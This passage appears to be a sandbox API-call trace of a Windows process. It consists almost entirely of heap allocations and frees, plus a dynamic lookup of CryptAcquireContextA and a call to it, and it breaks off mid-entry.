[0251.986] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0251.986] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0251.986] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0251.986] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0251.986] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0251.986] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0251.986] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa5e0 [0251.986] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0251.986] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0251.987] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0251.987] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0251.987] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0251.987] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0251.987] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0251.987] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0251.987] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0251.987] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1948 [0251.987] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0251.987] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0251.987] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0251.987] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0251.987] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0251.988] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0251.988] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0251.988] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0251.988] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0251.988] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0251.988] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0251.988] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0251.988] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0251.988] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0251.988] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0251.988] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0251.988] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0251.988] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0251.988] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0251.988] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0251.989] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0251.989] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0251.989] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0251.989] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0251.989] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0251.989] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0251.989] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0251.989] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0251.989] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0251.989] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0251.989] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0251.989] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0251.989] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0251.989] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0251.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0251.990] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0251.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0251.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0251.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa78 [0251.990] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0251.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0251.990] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0251.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0251.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0251.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0251.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0251.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0251.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa48 [0251.991] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0251.991] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0251.991] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0251.991] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0251.991] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0251.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0251.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0251.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0251.991] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0251.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa48 [0251.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0251.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0251.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa898 [0251.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0251.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0251.992] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0251.992] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0251.992] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa898 | out: hHeap=0x25c0000) returned 1 [0251.992] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0251.992] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0251.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0251.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0251.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa898 [0251.992] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0251.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0251.992] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0251.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0251.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0251.993] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0251.993] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0251.993] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0251.993] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0251.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0251.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0251.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0251.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0251.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0251.993] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0251.993] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0251.993] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0251.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0251.993] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0251.994] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0251.994] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0251.994] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0251.994] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0251.994] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0251.994] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0251.994] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0251.994] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0251.994] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0251.994] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0251.994] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0251.994] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0251.994] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0251.994] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0251.995] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0251.995] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa958 [0251.995] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0251.995] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0251.995] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0251.995] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0251.995] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa958 [0251.995] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0251.995] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0251.995] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0251.995] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1948 [0251.995] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0251.995] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0251.995] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0251.996] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0251.996] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0251.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1948 [0251.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0251.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0251.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0251.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0251.996] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0251.996] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0251.996] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0251.996] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0251.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0251.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0251.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0251.997] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0251.997] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0251.997] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0251.997] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0251.997] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0251.997] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0251.997] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0251.997] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0251.997] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0251.997] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0251.997] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0251.997] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0251.997] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0251.998] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0251.998] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0251.998] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0251.998] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0251.998] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0251.998] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa958 [0251.998] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0251.998] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0251.998] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0251.998] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0251.998] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0251.998] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0251.998] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0251.998] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0251.999] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0251.999] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0251.999] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466d90 [0251.999] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2466d90, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0251.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0251.999] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0251.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0251.999] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContext") returned 0x0 [0251.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0251.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0251.999] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0251.999] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x30) returned 0x24b34c8 [0252.000] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0252.000] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0252.000] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0252.000] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x15) returned 0x2466d90 [0252.000] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2466d90, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0252.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0252.000] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0252.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0252.000] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContextA") returned 0x74d491dd [0252.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0252.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0252.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b34c8 | out: hHeap=0x25c0000) returned 1 [0252.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0252.001] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466d90 [0252.001] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0252.001] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0252.001] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18d8 [0252.001] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0252.001] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0252.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0252.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0252.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0252.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0252.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0252.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0252.001] CryptAcquireContextA (in: phProv=0x8befe0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8befe0*=0xad2940) returned 1 [0252.002] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0252.002] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0252.002] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0252.002] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0252.002] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa958 [0252.002] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0252.002] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0252.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0252.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0252.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0252.003] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa958 [0252.003] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0252.003] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0252.003] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0252.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0252.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0252.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0252.003] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0252.003] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0252.003] RtlAllocateHeap 